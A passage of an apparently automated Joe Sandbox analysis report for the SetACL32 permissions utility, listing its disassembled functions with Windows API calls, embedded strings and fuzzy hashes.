                • GetLastError.KERNEL32 ref: 00F82AF1
                • GetAce.ADVAPI32(00790073,00000000,00000000), ref: 00F82B26
                • DeleteAce.ADVAPI32(00790073,00000000), ref: 00F82B52
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: DeleteErrorInformationLast
                • String ID: @M)w
                • API String ID: 1701277466-1211491014
                • Opcode ID: cd9437f86e27a4c0565639d404a002190dc7af7a25f61611afa440040241ed03
                • Instruction ID: a807f868798871e6831410689566592af2c6a8ee31fa85a16d3fbb062770bfeb
                • Opcode Fuzzy Hash: cd9437f86e27a4c0565639d404a002190dc7af7a25f61611afa440040241ed03
                • Instruction Fuzzy Hash: 7741D331A0021C8BDB20EFA5E855BFEB7A8EF99320F10055FE80697241DB35AD10A790
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F82920 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMON
                Download Yara Rule
                APIs
                • GetAclInformation.ADVAPI32(00790073,746D712B,0000000C,00000002,?,00000000,?,00000002), ref: 00F82989
                • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 00F82993
                • GetAce.ADVAPI32(00790073,00000000,00000000,?,00000000,?,00000002), ref: 00F829C6
                • DeleteAce.ADVAPI32(00790073,00000000,00000000,00000002,00000002,?,00000000,?,00000002), ref: 00F829EA
                • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 00F82A11
                • GetLastError.KERNEL32(?,00000000,?,00000002), ref: 00F82A35
                  • Part of subcall function 00F7D640: GetAclInformation.ADVAPI32(00000000,00000000,0000000C,00000002,?,00000000,00000000,?,00F82F41), ref: 00F7D681
                  • Part of subcall function 00F7D640: GetAce.ADVAPI32(00000000,00000000,00000000,?,00000000,00000000), ref: 00F7D6A8
                  • Part of subcall function 00F7D640: EqualSid.ADVAPI32(?,-00000008,?,00000000,00000000), ref: 00F7D6C1
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$Information$DeleteEqual
                • String ID: @M)w
                • API String ID: 1411212394-1211491014
                • Opcode ID: 03c5dbd2a2f50d3df724fd38c93e367e15e004a33e9424b2cfd3b6ce76095052
                • Instruction ID: 771e9992653ead214fbc3d6b65a25cf76fd4e7c30d60431ba05e28590cf5d1de
                • Opcode Fuzzy Hash: 03c5dbd2a2f50d3df724fd38c93e367e15e004a33e9424b2cfd3b6ce76095052
                • Instruction Fuzzy Hash: 69417331A0021D9BCB50EFA9D855BEEB7B8FF48320F10456BE906E7241DB75A910FB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8DEBC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • GetLastError.KERNEL32(?,?,00F8DEB3,00F8C567,00F8BBCC), ref: 00F8DECA
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00F8DED8
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00F8DEF1
                • SetLastError.KERNEL32(00000000,00F8DEB3,00F8C567,00F8BBCC), ref: 00F8DF43
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID: @M)w
                • API String ID: 3852720340-1211491014
                • Opcode ID: 575746b4bd1de0f210d0e43212e9ed14054de02b8e605c7319204d4666bd52a1
                • Instruction ID: c619c0da54833141b932e22b4378befed0cf33f8c5940543190caa9cec1eac35
                • Opcode Fuzzy Hash: 575746b4bd1de0f210d0e43212e9ed14054de02b8e605c7319204d4666bd52a1
                • Instruction Fuzzy Hash: D401D432A0D3169EAB2437747C8AEEA3794EF11375B200239F616461E1FF954C05B344
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8A938 Relevance: 12.2, APIs: 8, Instructions: 175COMMON
                Download Yara Rule
                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001,?,?,?), ref: 00F8A981
                • __alloca_probe_16.LIBCMT ref: 00F8A9AD
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 00F8A9EC
                • LCMapStringEx.KERNEL32 ref: 00F8AA09
                • LCMapStringEx.KERNEL32 ref: 00F8AA48
                • __alloca_probe_16.LIBCMT ref: 00F8AA65
                • LCMapStringEx.KERNEL32 ref: 00F8AAA7
                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00F8AACA
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ByteCharMultiStringWide$__alloca_probe_16
                • String ID:
                • API String ID: 2040435927-0
                • Opcode ID: 8a8ca65b1427037f326333b34066cb32d6adbeb23d789c35634c79668f751a71
                • Instruction ID: 08d2a2205c802310f22e6e7f342ac6450eefda028d89b858cc8cc58ec810e8fd
                • Opcode Fuzzy Hash: 8a8ca65b1427037f326333b34066cb32d6adbeb23d789c35634c79668f751a71
                • Instruction Fuzzy Hash: 9451E072A0021AEBFF24AF60CD40FEB3BA9EF44760F154426F914A6150E738CD10EB61
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F62EE0 Relevance: 11.0, APIs: 3, Strings: 3, Instructions: 489COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F6301E
                • std::locale::_Init.LIBCPMT ref: 00F63145
                • std::locale::_Init.LIBCPMT ref: 00F63235
                  • Part of subcall function 00F89DCB: __EH_prolog3.LIBCMT ref: 00F89DD2
                  • Part of subcall function 00F89DCB: std::_Lockit::_Lockit.LIBCPMT ref: 00F89DDD
                  • Part of subcall function 00F89DCB: std::locale::_Setgloballocale.LIBCPMT ref: 00F89DF8
                  • Part of subcall function 00F89DCB: std::_Lockit::~_Lockit.LIBCPMT ref: 00F89E4E
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: std::locale::_$Init$Lockitstd::_$H_prolog3Lockit::_Lockit::~_Setgloballocale
                • String ID: +qmt$\\?\$\\?\UNC\
                • API String ID: 1949052339-4042308094
                • Opcode ID: 7535bff05f7b92482e573b058465b2b6544531bcea162a4ae0ed46159d7ae0cf
                • Instruction ID: e672292775a1d09c920f4a169de07c15f29172daa9190bfc5e8c7b6e0c5e6904
                • Opcode Fuzzy Hash: 7535bff05f7b92482e573b058465b2b6544531bcea162a4ae0ed46159d7ae0cf
                • Instruction Fuzzy Hash: 9602E471E00148DFDF14DF68C8857EEBBB1AF45314F288128E805AB395DB759B88DB91
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F6BC60 Relevance: 11.0, APIs: 2, Strings: 5, Instructions: 466COMMON
                Download Yara Rule
                APIs
                • EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F6BC98
                • LeaveCriticalSection.KERNEL32(00FCB6D4), ref: 00F6BCAD
                  • Part of subcall function 00F69780: EnterCriticalSection.KERNEL32 ref: 00F697B8
                  • Part of subcall function 00F69780: LeaveCriticalSection.KERNEL32(00FCB6D4,?,?), ref: 00F69880
                  • Part of subcall function 00F62720: FindResourceW.KERNEL32(00000000,00000001,00000010,746D712B,?,?), ref: 00F6277B
                  • Part of subcall function 00F62720: LoadResource.KERNEL32(00000000,00000000), ref: 00F62788
                  • Part of subcall function 00F62720: LockResource.KERNEL32(00000000), ref: 00F62795
                  • Part of subcall function 00F62720: FreeResource.KERNEL32(00000000), ref: 00F627EF
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CriticalSection$Resource$Enter$LeaveTime$CurrentErrorFileFindFreeLastLoadLockNameSystemThreadUser
                • String ID: on $====================================================================$FileVersion$SetLogFile$Starting SetACL.exe
                • API String ID: 1494673426-2110037876
                • Opcode ID: c77d36d688c19f71a207329cfd7753989dc684a0ccb413992f3e3736423f2a67
                • Instruction ID: faf17b3cff0c48ebd4888ed1a8a72c2c7eea039c82f9fc50a098188166d660bf
                • Opcode Fuzzy Hash: c77d36d688c19f71a207329cfd7753989dc684a0ccb413992f3e3736423f2a67
                • Instruction Fuzzy Hash: DF020771A10248DBEF04DFA4CD89BDDBB72FF45304F20824CE444AB295D779AA84DBA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F75CE5 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 385COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F75DB8
                • std::locale::_Init.LIBCPMT ref: 00F75E01
                • std::locale::_Init.LIBCPMT ref: 00F75E49
                • std::locale::_Init.LIBCPMT ref: 00F75F56
                • std::locale::_Init.LIBCPMT ref: 00F75FA5
                • std::locale::_Init.LIBCPMT ref: 00F75FED
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_
                • String ID: hkey_local_machine$hklm$machine
                • API String ID: 1620887387-1905530886
                • Opcode ID: f0b60d1f3fcbaafc0a49b484092a549469e7448747f507fd457e5a113ee6a9f0
                • Instruction ID: e9c1f204f5c1c7ac8bb4f6d727f9d0589671a8445940f34126d04810c63af528
                • Opcode Fuzzy Hash: f0b60d1f3fcbaafc0a49b484092a549469e7448747f507fd457e5a113ee6a9f0
                • Instruction Fuzzy Hash: 24E1F471E005188BEF18CB68CC85BDDB772AF84304F20C29AE509EB2D5DB759E85DB52
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F75C3D Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 349COMMON
                Download Yara Rule
                APIs
                • std::locale::_Init.LIBCPMT ref: 00F75DB8
                • std::locale::_Init.LIBCPMT ref: 00F75E01
                • std::locale::_Init.LIBCPMT ref: 00F75E49
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Initstd::locale::_
                • String ID: hkey_local_machine$hklm$machine
                • API String ID: 1620887387-1905530886
                • Opcode ID: d1394631150251aaef5b3959dde9f36df9406083a5d4ce22ce7154b8696a5c50
                • Instruction ID: d76e4bfa247d703231445227757cf4926ba18c080d708ee49e28bf64f5225a4c
                • Opcode Fuzzy Hash: d1394631150251aaef5b3959dde9f36df9406083a5d4ce22ce7154b8696a5c50
                • Instruction Fuzzy Hash: 32D11571E006189BEF14CFA4CC85BDDB772AF84304F20819AE509EB295DB75EE85DB42
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F62850 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 210COMMON
                Download Yara Rule
                APIs
                • VerQueryValueW.VERSION(00000000,?,?,?,\VarFileInfo\Translation,00000018,746D712B,00000000,?,00000000), ref: 00F62906
                • GetUserDefaultLangID.KERNEL32(\StringFileInfo\%04X04B0\%s), ref: 00F62A09
                • VerQueryValueW.VERSION(00000000,?,?,?,?,?), ref: 00F62AA5
                  • Part of subcall function 00F586F0: std::locale::_Init.LIBCPMT ref: 00F587B8
                Strings
                • \StringFileInfo\%04X04B0\%s, xrefs: 00F629F3
                • \VarFileInfo\Translation, xrefs: 00F628BC
                • \StringFileInfo\%04x%04x\%s, xrefs: 00F62921
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: QueryValue$DefaultInitLangUserstd::locale::_
                • String ID: \StringFileInfo\%04X04B0\%s$\StringFileInfo\%04x%04x\%s$\VarFileInfo\Translation
                • API String ID: 2791023842-1470331934
                • Opcode ID: 078801f569c928c89299e309a827f32515ae74f44c372c60932ca4784d4cf954
                • Instruction ID: 3ca11c6dd89a4496454936119284146f6c3cfdef36951da9076caf62d03da5a4
                • Opcode Fuzzy Hash: 078801f569c928c89299e309a827f32515ae74f44c372c60932ca4784d4cf954
                • Instruction Fuzzy Hash: 0F816A70A00249CFDB18DFA4C855BEEB7B5EF84304F008559E906B7281DB785A49EFA1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F62B40 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 187COMMON
                Download Yara Rule
                APIs
                • GetComputerNameW.KERNEL32 ref: 00F62BA2
                • GetLastError.KERNEL32 ref: 00F62BB0
                  • Part of subcall function 00F688E0: GetLastError.KERNEL32(746D712B,00000000,00000000), ref: 00F68960
                  • Part of subcall function 00F698F0: EnterCriticalSection.KERNEL32(00FCB6D4,746D712B,?), ref: 00F69982
                  • Part of subcall function 00F698F0: GetSystemTimeAsFileTime.KERNEL32(?), ref: 00F699CB
                  • Part of subcall function 00F698F0: GetCurrentThreadId.KERNEL32 ref: 00F699EE
                  • Part of subcall function 00F698F0: GetUserNameExW.SECUR32(00000002,00000000,00000000), ref: 00F69A2A
                  • Part of subcall function 00F698F0: GetLastError.KERNEL32 ref: 00F69A34
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: ErrorLast$NameTime$ComputerCriticalCurrentEnterFileSectionSystemThreadUser
                • String ID: +qmt$@M)w$GetComputerNameAPIWrapper$Querying the computer name failed with:
                • API String ID: 2272594576-141549578
                • Opcode ID: f67ac538d3ea1343d5319bc8b780b146df2d527a05f5810fd89967e1f9ccc2f9
                • Instruction ID: 9bbdad57958eaa87edd834e11d2f195a29d27d639ad2ad50e240a8c7ee1aa1c0
                • Opcode Fuzzy Hash: f67ac538d3ea1343d5319bc8b780b146df2d527a05f5810fd89967e1f9ccc2f9
                • Instruction Fuzzy Hash: B551F971E006489FDB04DFA4CC85BEEB776FF85310F10861DE815AB295DB74AA84DB50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8C6A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 122COMMON
                Download Yara Rule
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 00F8C6D7
                • ___except_validate_context_record.LIBVCRUNTIME ref: 00F8C6DF
                • _ValidateLocalCookies.LIBCMT ref: 00F8C768
                • __IsNonwritableInCurrentImage.LIBCMT ref: 00F8C793
                • _ValidateLocalCookies.LIBCMT ref: 00F8C7E8
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: 672023c5d4b6d5c1f773f4742997535e5ba13541373affdf90a0f166eaae6ce7
                • Instruction ID: d3cfa3bcb00f5c12359008986681f798e9f06eaa0f5751349290e1a5ac3813f4
                • Opcode Fuzzy Hash: 672023c5d4b6d5c1f773f4742997535e5ba13541373affdf90a0f166eaae6ce7
                • Instruction Fuzzy Hash: 9841A334E002199BCF10EF68CC85ADE7BB5EF46324F148165E8149B392D7359A05EFE1
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F97E53 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00F97B9F: _free.LIBCMT ref: 00F97BC4
                • _free.LIBCMT ref: 00F97EA1
                  • Part of subcall function 00F9800F: HeapFree.KERNEL32(00000000,00000000,?,00F96ACD), ref: 00F98025
                  • Part of subcall function 00F9800F: GetLastError.KERNEL32(?,?,00F96ACD), ref: 00F98037
                • _free.LIBCMT ref: 00F97EAC
                • _free.LIBCMT ref: 00F97EB7
                • _free.LIBCMT ref: 00F97F0B
                • _free.LIBCMT ref: 00F97F16
                • _free.LIBCMT ref: 00F97F21
                • _free.LIBCMT ref: 00F97F2C
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: a2948cd45a09085361632f2f8d60afe16e586b543b1255bd1d48c816b59ba376
                • Instruction ID: 6775f02ee31f1bd3ee879290c77d7a7b247aea5ccc6c1712257d50087cd68bbf
                • Opcode Fuzzy Hash: a2948cd45a09085361632f2f8d60afe16e586b543b1255bd1d48c816b59ba376
                • Instruction Fuzzy Hash: 26117F72654F04AAFE30BFB0CC47FCB779C6F41754F400814B3A9A60AAEB28B515BA50
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F8EF02 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                • FreeLibrary.KERNEL32(00000000,?,?,?,00F8EFC3,?,?,00FCAE1C,00000000,?,00F8F0EE,00000004,InitializeCriticalSectionEx,00FB0108,00FB0110,00000000), ref: 00F8EF92
                Strings
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: FreeLibrary
                • String ID: @M)w$api-ms-
                • API String ID: 3664257935-3985099169
                • Opcode ID: b69e867f8d759419152ab38c85aa20202d41ee7f85d915b1215e395d93144a85
                • Instruction ID: 2094f7ceb7fb4ef0393e1aaad41375f0be04c9e8be89560bec4ca9a1064cc04f
                • Opcode Fuzzy Hash: b69e867f8d759419152ab38c85aa20202d41ee7f85d915b1215e395d93144a85
                • Instruction Fuzzy Hash: 1F11C636E41625ABDF226B689C44BDE37A49F017B0F154121FA05E72C0D770ED00B7D5
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F7D780 Relevance: 9.2, APIs: 6, Instructions: 161COMMON
                Download Yara Rule
                APIs
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?), ref: 00F7D7CF
                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002,?,?), ref: 00F7D7E2
                • GetAce.ADVAPI32(?,00000000,00000000,?,?), ref: 00F7D808
                • IsWellKnownSid.ADVAPI32(-00000008,00000003,?,?), ref: 00F7D83A
                • GetAce.ADVAPI32(?,00000000,00000000,?,?), ref: 00F7D86B
                • EqualSid.ADVAPI32(-00000008,?,?,?), ref: 00F7D881
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Information$EqualKnownWell
                • String ID:
                • API String ID: 3987763275-0
                • Opcode ID: 420df23892dc9142a031e7b9e43182043bd1187417630522752e974c3a4e0f28
                • Instruction ID: 91700f7e04b9391086d24d8f2b90fa371c49fa83a1186c20025a24456a928a5b
                • Opcode Fuzzy Hash: 420df23892dc9142a031e7b9e43182043bd1187417630522752e974c3a4e0f28
                • Instruction Fuzzy Hash: 67518B71E002189BDF10CF64C955BEEBBF5AF09360F58805AE989A7281D735ED01EB62
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F82740 Relevance: 9.2, APIs: 6, Instructions: 160COMMON
                Download Yara Rule
                APIs
                • IsValidSid.ADVAPI32(?,?), ref: 00F827B4
                • IsValidSid.ADVAPI32(?), ref: 00F827C3
                • EqualSid.ADVAPI32(?,?), ref: 00F827D1
                • IsValidSid.ADVAPI32(?,?), ref: 00F82859
                • IsValidSid.ADVAPI32(00000008), ref: 00F82868
                • EqualSid.ADVAPI32(?,00000008), ref: 00F82876
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(00000000,00000000,00000000,00F89605,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8783E
                  • Part of subcall function 00F87820: IsValidSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F8784B
                  • Part of subcall function 00F87820: GetLengthSid.ADVAPI32(000C46C7,?,00F897F0,00F89605,00000000,000000FF), ref: 00F87852
                  • Part of subcall function 00F87820: CopySid.ADVAPI32(00F897F0,00000000,000C46C7,00F897F0,00F89605,00000000,000000FF), ref: 00F87871
                Memory Dump Source
                • Source File: 00000003.00000002.338368000.0000000000F51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F50000, based on PE: true
                • Associated: 00000003.00000002.338362492.0000000000F50000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338421805.0000000000FAE000.00000002.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338438228.0000000000FC9000.00000004.00000001.01000000.00000005.sdmpDownload File
                • Associated: 00000003.00000002.338444573.0000000000FCC000.00000002.00000001.01000000.00000005.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_f50000_SetACL32.jbxd
                Similarity
                • API ID: Valid$Equal$CopyLength
                • String ID:
                • API String ID: 1685539899-0
                • Opcode ID: e1e9504ed12b0afd9a12e20ef2bb393d82585145c11e966ff67078ec5b87e1e2
                • Instruction ID: 56cac18dd8d73353e7cc3ec41140f7d55b218ec721fab1fba8f072057fdca7c6
                • Opcode Fuzzy Hash: e1e9504ed12b0afd9a12e20ef2bb393d82585145c11e966ff67078ec5b87e1e2
                • Instruction Fuzzy Hash: A4515E71E012159BDF59EF69C884BEEBBB8BF05310F08416AE805AB251D774FA44EB90
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00F5B170 Relevance: 9.1, APIs: 6, Instructions: 130COMMONLIBRARYCODE
                Download Yara Rule
                APIs
